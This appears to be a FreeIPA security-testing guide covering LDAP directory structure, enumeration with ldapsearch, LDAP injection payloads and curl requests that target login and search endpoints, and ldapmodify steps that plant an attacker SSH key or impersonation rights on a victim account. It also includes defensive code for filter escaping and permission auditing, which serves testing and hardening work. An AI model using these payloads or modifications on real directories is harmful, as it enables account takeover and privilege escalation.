Directory Services

Explore the LDAP directory structure in FreeIPA and techniques to test its security.


LDAP Overview

FreeIPA uses 389 Directory Server (formerly Fedora Directory Server) as its LDAP component. This directory server stores information about users, groups, hosts, and other objects necessary to manage the security aspects of a network of computers.

LDAP Directory Structure

Overview of the LDAP directory structure in FreeIPA

Directory Structure

The FreeIPA LDAP directory has a specific structure with several key containers that store different types of objects. Understanding this structure is essential for navigating and testing the directory.

Key Containers

FreeIPA organizes its LDAP directory into several key containers, each serving a specific purpose.

Common FreeIPA LDAP Containers

cn=accounts,dc=example,dc=com

The main container for user, group, and host accounts.

cn=users,cn=accounts,dc=example,dc=com

Contains user accounts.

cn=groups,cn=accounts,dc=example,dc=com

Contains user groups.

cn=computers,cn=accounts,dc=example,dc=com

Contains host entries.

cn=hostgroups,cn=accounts,dc=example,dc=com

Contains host groups.

cn=hbac,dc=example,dc=com

Contains Host-Based Access Control (HBAC) rules.

cn=sudo,dc=example,dc=com

Contains sudo rules.

cn=etc,dc=example,dc=com

Contains configuration information.

Exploring the Directory Structure

You can explore the FreeIPA directory structure using LDAP search commands.

Get the base naming contexts of the LDAP server
ldapsearch -x -h <target_ip> -b "" -s base namingContexts
List the top-level containers
ldapsearch -x -h <target_ip> -D "uid=admin,cn=users,cn=accounts,dc=example,dc=com" -w password -b "dc=example,dc=com" -s one "(objectClass=*)"
List the containers under cn=accounts
ldapsearch -x -h <target_ip> -D "uid=admin,cn=users,cn=accounts,dc=example,dc=com" -w password -b "cn=accounts,dc=example,dc=com" -s one "(objectClass=*)"

LDAP Injection

LDAP injection is a technique in which an attacker changes the meaning of an LDAP query by supplying input that contains filter metacharacters (the asterisk, parentheses and the pipe) which the application concatenates into the filter unescaped. This can lead to unauthorized access or information disclosure.

LDAP Filter Injection

LDAP filter injection involves manipulating LDAP search filters to bypass authentication or access unauthorized information.

Basic LDAP injection payload to bypass authentication
username=*)(uid=*))(|(uid=*
LDAP injection payload targeting admin authentication
username=admin))(|(password=*

LDAP Injection Note:

Applications that build LDAP filters by concatenating user input might be vulnerable to LDAP injection attacks. Modern versions of FreeIPA typically sanitize inputs, but custom integrations or older versions might be vulnerable.
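The following is an added example, not code from the original page or from the FreeIPA project. It contrasts the vulnerable pattern (user input concatenated into a filter) with the hardened one (the value escaped per RFC 4515), and checks both against the two payloads shown above. The "(uid=...)" lookup, the posixAccount object class in the filter and all function names are illustrative assumptions.

```python
# Added example (not from the original page or the FreeIPA project): the
# difference between concatenating user input into an LDAP filter and
# escaping it per RFC 4515, checked against the injection payloads shown
# above. The "(uid=...)" lookup and all function names are illustrative.

# RFC 4515 requires these characters to be hex-escaped inside an assertion value.
RFC4515_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_filter_value(value: str) -> str:
    """Escape one assertion value so it can only ever match a literal string."""
    return "".join(RFC4515_ESCAPES.get(ch, ch) for ch in value)


def unsafe_user_filter(username: str) -> str:
    """Vulnerable pattern: the username is pasted into the filter unchanged."""
    return f"(&(objectClass=posixAccount)(uid={username}))"


def safe_user_filter(username: str) -> str:
    """Hardened pattern: metacharacters in the username are escaped first."""
    return f"(&(objectClass=posixAccount)(uid={escape_filter_value(username)}))"


def top_level_terms(flt: str) -> int:
    """Count parenthesised terms at depth 0; a well-formed filter has exactly one.

    Returns -1 when parentheses do not balance. Escaped parentheses (\\28, \\29)
    are ordinary characters and are therefore not counted.
    """
    depth = 0
    terms = 0
    for ch in flt:
        if ch == "(":
            if depth == 0:
                terms += 1
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0:
                return -1
    return terms if depth == 0 else -1


if __name__ == "__main__":
    # The two payloads from the page: each splits the unsafe filter into two
    # top-level terms, while the escaped version stays a single literal lookup.
    for payload in ("*)(uid=*))(|(uid=*", "admin))(|(password=*"):
        print("payload:", payload)
        unsafe = unsafe_user_filter(payload)
        safe = safe_user_filter(payload)
        print("  unsafe:", unsafe, "-> top-level terms:", top_level_terms(unsafe))
        print("  safe:  ", safe, "-> top-level terms:", top_level_terms(safe))
```

A filter that ends up with more than one top-level term, or with unbalanced parentheses, is the signature of a successful injection; the escaped form always stays a single term because the attacker's parentheses become the three-character sequences \28 and \29 rather than structural characters.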

Web Interface Injection

The FreeIPA web interface might be vulnerable to LDAP injection if it doesn't properly sanitize user input.

Test search functionality for LDAP injection vulnerabilities
curl -k "https://<target_ip>/ipa/ui/search?search_term=*)(uid=*)(|(uid=*"
Test login functionality for LDAP injection
curl -k -X POST "https://<target_ip>/ipa/session/login_password" -d "user=*)(uid=*))(|(uid=*&password=test"
Diagram (not reproduced here): LDAP injection process.

Unauthorized Modifications

Unauthorized modifications occur when a principal is able to change LDAP entries or attributes that the directory's access controls should have prevented it from touching. This can lead to privilege escalation or unauthorized access.

ACL Bypass

Access control in FreeIPA is enforced by 389 Directory Server ACIs, which FreeIPA manages as permissions, privileges and roles; together these define who can read or modify which attributes. Bypassing these controls, or finding ones that are broader than intended, can allow unauthorized modifications.

Attempt to modify LDAP entries using an authenticated user
ldapmodify -x -h <target_ip> -D "uid=user,cn=users,cn=accounts,dc=example,dc=com" -w password -f modify.ldif
Search for permission entries (FreeIPA keeps them under cn=permissions,cn=pbac) to identify potential ACL weaknesses
ldapsearch -x -h <target_ip> -D "uid=user,cn=users,cn=accounts,dc=example,dc=com" -w password -b "cn=pbac,dc=example,dc=com" -s sub "(objectClass=ipaPermission)"

ACL Bypass Note:

Look for misconfigured ACLs that might allow users to modify attributes or objects they shouldn't have access to. Pay special attention to self-service capabilities that might allow users to modify their own attributes.
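An added example (not from the original page or the FreeIPA project) of the review the note above asks for: it parses the LDIF that ldapsearch prints for ipaPermission entries and flags permissions that grant write-class rights to anonymous or all binds, or that grant write on sensitive attributes through a privilege and therefore deserve a membership review. The attribute names ipaPermRight, ipaPermBindRuleType and ipaPermIncludedAttr are the ones FreeIPA uses for permissions; the sample entries are constructed (modelled on FreeIPA's managed permissions), and the severity thresholds and the sensitive-attribute list are this example's own choices.

```python
# Added example (not from the original page or the FreeIPA project): audit
# ipaPermission entries from an LDIF dump for overly broad write rights.
# SAMPLE_LDIF is constructed for this example; the third entry is the
# deliberately misconfigured one. Attribute names are FreeIPA's, the
# thresholds and SENSITIVE_ATTRS are this example's assumptions.
import base64

SAMPLE_LDIF = """\
dn: cn=System: Manage User SSH Public Keys,cn=permissions,cn=pbac,dc=example,dc=com
objectClass: ipaPermission
cn: System: Manage User SSH Public Keys
ipaPermRight: write
ipaPermBindRuleType: permission
ipaPermIncludedAttr: ipasshpubkey
ipaPermLocation: cn=users,cn=accounts,dc=example,dc=com
member: cn=User Administrators,cn=privileges,cn=pbac,dc=example,
 dc=com

dn: cn=System: Read Users,cn=permissions,cn=pbac,dc=example,dc=com
objectClass: ipaPermission
cn: System: Read Users
ipaPermRight: read
ipaPermRight: search
ipaPermRight: compare
ipaPermBindRuleType: all
ipaPermIncludedAttr: uid
ipaPermIncludedAttr: cn

dn: cn=Custom: anyone edits SSH keys,cn=permissions,cn=pbac,dc=example,dc=com
objectClass: ipaPermission
cn: Custom: anyone edits SSH keys
ipaPermRight: write
ipaPermBindRuleType: all
ipaPermIncludedAttr: ipasshpubkey
ipaPermLocation: cn=users,cn=accounts,dc=example,dc=com
"""

# Attributes whose write access effectively hands over an account (example's choice).
SENSITIVE_ATTRS = {"ipasshpubkey", "userpassword", "krbprincipalkey", "member", "memberof"}
WRITE_RIGHTS = {"write", "add", "delete", "all"}


def parse_ldif(text: str) -> list[dict[str, list[str]]]:
    """Minimal LDIF reader: blank line separates entries, leading space folds a
    line, '::' marks a base64 value. Attribute names are lower-cased."""
    entries, current, last_attr = [], {}, None
    for raw in text.splitlines():
        if raw.startswith("#"):
            continue
        if raw == "":
            if current:
                entries.append(current)
            current, last_attr = {}, None
            continue
        if raw.startswith(" ") and last_attr:        # folded continuation line
            current[last_attr][-1] += raw[1:]
            continue
        attr, _, value = raw.partition(":")
        if value.startswith(":"):                     # base64-encoded value
            value = base64.b64decode(value[1:].strip()).decode("utf-8")
        else:
            value = value.strip()
        attr = attr.strip().lower()
        current.setdefault(attr, []).append(value)
        last_attr = attr
    if current:
        entries.append(current)
    return entries


def audit_permissions(entries: list[dict[str, list[str]]]) -> list[dict]:
    """Return findings for permissions that grant write-class rights too widely."""
    findings = []
    for e in entries:
        if "ipapermission" not in {v.lower() for v in e.get("objectclass", [])}:
            continue
        name = e.get("cn", ["<unnamed>"])[0]
        rights = {r.lower() for r in e.get("ipapermright", [])}
        bind = e.get("ipapermbindruletype", ["permission"])[0].lower()
        attrs = {a.lower() for a in e.get("ipapermincludedattr", [])}
        writes = rights & WRITE_RIGHTS
        if writes and bind in {"anonymous", "all"}:
            findings.append({"name": name, "severity": "high",
                             "reason": f"bind rule '{bind}' grants {sorted(writes)}"})
        elif writes and attrs & SENSITIVE_ATTRS:
            findings.append({"name": name, "severity": "review",
                             "reason": f"write on {sorted(attrs & SENSITIVE_ATTRS)} "
                                       f"via privileges {e.get('member', [])}"})
    return findings


if __name__ == "__main__":
    for f in audit_permissions(parse_ldif(SAMPLE_LDIF)):
        print(f"[{f['severity']}] {f['name']}: {f['reason']}")
```

To run it against a live server, pipe the ldapsearch output from the command above into parse_ldif in place of SAMPLE_LDIF. Read-only permissions bound to "all" are normal in FreeIPA and are not flagged; what matters is the combination of a write-class right with an unrestricted bind rule, or with a sensitive attribute whose granting privilege has more members than expected.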

Attribute Manipulation

Some attributes, if modified, can grant additional access or capabilities to attackers.

Create LDIF file to add impersonation rights
echo -e "dn: uid=victim,cn=users,cn=accounts,dc=example,dc=com\nchangetype: modify\nadd: objectClass\nobjectClass: ipaAllowToImpersonate" > impersonate.ldif
Attempt to modify the victim's object to allow impersonation
ldapmodify -x -h <target_ip> -D "uid=attacker,cn=users,cn=accounts,dc=example,dc=com" -w password -f impersonate.ldif

Example: Adding an SSH Key

Create LDIF file to add an SSH key
echo -e "dn: uid=victim,cn=users,cn=accounts,dc=example,dc=com\nchangetype: modify\nadd: ipaSshPubKey\nipaSshPubKey: ssh-rsa AAAA... attacker@example.com" > add_ssh_key.ldif
Attempt to add the SSH key
ldapmodify -x -h <target_ip> -D "uid=attacker,cn=users,cn=accounts,dc=example,dc=com" -w password -f add_ssh_key.ldif